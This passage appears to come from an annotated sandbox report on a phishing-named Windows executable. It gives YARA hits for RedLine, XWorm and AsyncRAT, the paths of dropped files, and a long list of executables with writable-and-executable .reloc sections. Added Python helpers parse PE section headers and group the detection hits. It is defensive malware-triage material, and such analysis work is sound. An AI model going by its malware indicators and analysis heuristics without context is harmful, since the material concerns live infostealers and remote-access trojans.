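    0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE", 0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED", 0x0020: "LARGE_ADDRESS_AWARE", 0x0100: "32BIT_MACHINE",
    0x0200: "DEBUG_STRIPPED", 0x1000: "SYSTEM", 0x2000: "DLL",
}
MACHINES = {0x14C: "i386", 0x8664: "AMD64", 0xAA64: "ARM64"}
# IMAGE_SCN_* section characteristics
SCN_CODE, SCN_EXECUTE, SCN_READ, SCN_WRITE = 0x00000020, 0x20000000, 0x40000000, 0x80000000
MAX_ORDINARY_SECTIONS = 10   # the sandbox's threshold: "Number of sections : 12 > 10"


def inspect_pe(data):
    """Read only the COFF header and section table; no optional header or imports needed."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not at e_lfanew")
    coff = e_lfanew + 4
    machine, nsec, _stamp, _symtab, _nsyms, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    table = coff + 20 + opt_size          # section headers follow the optional header
    if table + 40 * nsec > len(data):
        raise ValueError("section table truncated")
    sections = []
    for i in range(nsec):
        off = table + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        flags = struct.unpack_from("<I", data, off + 36)[0]   # Characteristics field
        sections.append((name, flags))
    findings = []
    if nsec > MAX_ORDINARY_SECTIONS:
        findings.append(f"{nsec} sections > {MAX_ORDINARY_SECTIONS}")
    for name, flags in sections:
        if flags & SCN_EXECUTE and flags & SCN_WRITE:
            findings.append(f"section {name!r} is writable and executable")
    return {
        "machine": MACHINES.get(machine, hex(machine)),
        "number_of_sections": nsec,
        "characteristics": [n for bit, n in sorted(IMAGE_FILE_FLAGS.items()) if chars & bit],
        "sections": sections,
        "findings": findings,
    }


def build_pe(sections, characteristics=0x0122, machine=0x14C):
    """Constructed header-only image for testing (not a runnable binary): DOS header with
    e_lfanew, PE signature, COFF header with an empty optional header, then one 40-byte
    header per (name, flags) in `sections`. 0x0122 is the sample's flag combination."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", machine, len(sections), 0, 0, 0, 0, characteristics)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode("ascii"), 0, 0, 0, 0, 0, 0, 0, 0, flags)
        for name, flags in sections)
    return bytes(dos) + b"PE\0\0" + coff + table


if __name__ == "__main__":
    ordinary = build_pe([(".text", SCN_CODE | SCN_EXECUTE | SCN_READ), (".data", SCN_READ | SCN_WRITE)])
    crowded = build_pe([(f"s{i}", SCN_READ) for i in range(11)] + [(".wx", SCN_EXECUTE | SCN_READ | SCN_WRITE)])
    for img in (ordinary, crowded):
        print(inspect_pe(img))
```

Treat the section count as a prompt to look, not a verdict: a 32-bit EXECUTABLE_IMAGE with a section that is both writable and executable is the combination worth stopping on. For a real file, pass open(path, "rb").read() to inspect_pe; it deliberately parses nothing beyond the section table, so it cannot be led astray by a malformed optional header or import directory.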
Source: 5.2.RegSvcs.exe.3d96bf0.6.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 5.2.RegSvcs.exe.3d007a0.4.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 6.0.build.exe.6b0000.0.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 5.2.RegSvcs.exe.3d007a0.4.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 5.2.RegSvcs.exe.2d0ea18.1.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 5.2.RegSvcs.exe.2d0ea18.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.RegSvcs.exe.3d4b9d0.5.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 5.2.RegSvcs.exe.2d0ea18.1.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 5.2.RegSvcs.exe.2d0ea18.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.RegSvcs.exe.2d18074.2.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 5.2.RegSvcs.exe.2d18074.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.RegSvcs.exe.2d053d4.3.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 5.2.RegSvcs.exe.2d053d4.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.RegSvcs.exe.2d18074.2.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 5.2.RegSvcs.exe.2d18074.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.RegSvcs.exe.2d053d4.3.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 5.2.RegSvcs.exe.2d053d4.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.0.XClient.exe.b20000.0.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 7.0.XClient.exe.b20000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.RegSvcs.exe.3d96bf0.6.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 5.2.RegSvcs.exe.3d4b9d0.5.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 00000005.00000002.1271729199.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000007.00000000.1260246043.0000000000B22000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
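Two things in the YARA block above are easy to misread. First, every dumped region is listed twice, once as `.unpack` (mapped layout) and once as `.raw.unpack` (file layout), so the 28 hit lines describe far fewer distinct objects than they appear to. Second, `MALWARE_Win_AsyncRAT` fires on exactly the regions and dropped files that `rat_win_xworm_v3` fires on; the report's own verdict is RedLine plus XWorm, so the AsyncRAT hits corroborate the XWorm classification rather than indicating a third family. Also note that the `hash =` value in the Sekoia rule metadata is the rule author's reference sample, not this sample's hash. The following helper, added here and not part of the Joe Sandbox report, folds the hit lines into per-rule source sets and compares two rules' coverage; `REPORT_LINES` is a constructed subset of the lines above with the descriptions shortened.

```python
"""Collapse sandbox YARA hit lines into per-rule source sets so that
co-firing rules can be compared. Stdlib only; REPORT_LINES is a constructed
subset of the report's lines, descriptions shortened."""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^Source: (?P<source>.+?), type: (?P<type>\w+) "
    r"Matched rule: (?P<rule>\S+) author = (?P<author>[^,]+)"
)

REPORT_LINES = r"""
Source: 5.2.RegSvcs.exe.2d0ea18.1.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples
Source: 5.2.RegSvcs.exe.2d0ea18.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.RegSvcs.exe.2d0ea18.1.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples
Source: 5.2.RegSvcs.exe.2d0ea18.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.RegSvcs.exe.3d007a0.4.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples
Source: 5.2.RegSvcs.exe.3d007a0.4.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples
Source: 6.0.build.exe.6b0000.0.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples
Source: 00000007.00000000.1260246043.0000000000B22000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
""".strip().splitlines()


def normalize(source: str) -> str:
    """'.raw.unpack' and '.unpack' name the same dumped region (file layout
    versus mapped layout), so fold them into one key."""
    return re.sub(r"\.raw\.unpack$", ".unpack", source)


def parse_hits(lines):
    """Return [(normalized source, source type, rule name), ...] for every
    line that has the report's 'Source: ... Matched rule: ...' shape."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            hits.append((normalize(m["source"]), m["type"], m["rule"]))
    return hits


def hits_by_rule(lines):
    """Map each rule to the sorted list of distinct sources it matched."""
    by_rule = defaultdict(set)
    for source, _type, rule in parse_hits(lines):
        by_rule[rule].add(source)
    return {rule: sorted(srcs) for rule, srcs in by_rule.items()}


def co_firing(lines, rule_a, rule_b):
    """Split the sources of two rules into shared and rule-exclusive sets;
    a near-empty exclusive set means the rules describe the same code."""
    by_rule = hits_by_rule(lines)
    a = set(by_rule.get(rule_a, ()))
    b = set(by_rule.get(rule_b, ()))
    return {
        "both": sorted(a & b),
        "only_" + rule_a: sorted(a - b),
        "only_" + rule_b: sorted(b - a),
    }


if __name__ == "__main__":
    for rule, sources in hits_by_rule(REPORT_LINES).items():
        print(f"{rule}: {len(sources)} distinct source(s)")
    print(co_firing(REPORT_LINES, "rat_win_xworm_v3", "MALWARE_Win_AsyncRAT"))
```

On the constructed subset the only AsyncRAT-exclusive hit is the `MEMORY` dump at `...B22000...sdmp`, which is the same XClient.exe image that `7.0.XClient.exe.b20000.0.unpack` reports under both rules; the memory-dump entries in this report simply were not matched against the Sekoia rule.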
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: exhilaratingly.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MavInject32.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: OfficeC2RClient.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: plugin-container.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: private_browsing.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info_x64.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3_x64.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: officesvcmgr.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_pwa_launcher.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevated_tracing_service.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrmstp.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe0.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SciTE.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeARMHelper.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jaureg.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jucheck.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jusched.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zG.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe0.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe0.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe0.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Acrobat.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcrobatInfo.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
